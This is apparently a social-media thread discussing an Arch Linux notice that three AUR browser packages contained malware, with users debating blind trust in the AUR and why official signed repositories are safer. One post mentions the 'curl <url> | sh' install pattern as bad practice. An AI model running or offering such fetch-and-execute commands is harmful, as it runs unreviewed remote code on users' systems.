Arch Linux 
[aur-general] - [SECURITY] firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin AUR packages contained malware
CyberFrog@archlinux nice, isn't it cool how every arch user I've ever met thinks it's totally fine to run arbitrary binaries from strangers, with absolutely no concept of what project packaging is and what official maintainers do
Christian Heusel> DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.
Reckless people will do reckless things, users are advised to audit PKGBUILDs and all changes to them.
@gromit @archlinux yeah, but everyone totally ignores or plays down the warnings, there is a culture of blindly trusting the AUR among arch users usually
I'm a long time contributor to a large Linux community online, and often one of the first things users do on a clean install is setup an AUR helper and blindly pull packages they want
I'm a long time contributor to a large Linux community online, and often one of the first things users do on a clean install is setup an AUR helper and blindly pull packages they want
@froge @archlinux Well yes, but from our side users are advised not to use an AUR helper until they know what they're doing ..
But if people continue to ignore advice and good practises and also keep installing stuff with "curl <url> | sh" you maybe just can't help them :D
Lucy@gromit @froge @archlinux Love how literally half the time I see an oficial arch post/talk it contains "Don't trust the AUR and don't/only very carefully use helpers", I'm always agreeing and reinforcing that, yet I run a script to automatically compile over 100 AUR packages inside a docker container where the build user has root access without a password lol
�@gromit @froge @archlinux is their an explanation for dumb people like me, why it is more unlikely that something like that will happen in the official packages or even in the debian repository. like a package maintainer goes rogue?
@utf_7 @gromit @archlinux the official repos are managed by trusted maintainers and have a review and quality assurance process which is likely to catch any malicious or incorrect changes
the AUR is simply a list of packages maintained by random people who have free reign to update them whenever they want, with anything they want, without review or checks
using the AUR is a bit like going and installing a random binary from a random github project, without anyone checking the code at all, the official repos have a lot of peer review by people with good reputations in the arch community
the AUR is simply a list of packages maintained by random people who have free reign to update them whenever they want, with anything they want, without review or checks
using the AUR is a bit like going and installing a random binary from a random github project, without anyone checking the code at all, the official repos have a lot of peer review by people with good reputations in the arch community
Nekko@utf_7 Is it possible? Sure. But then the maintainers credentials are compromised or the maintainer is malicious. For both of them you can remove the maintainer from the project and they generally aren't considered trustworthy anymore if done maliciously.
Since distro packages are signed the provided build/binary and its build script is "vouched for" (to some degree) by the maintainer that signed the package.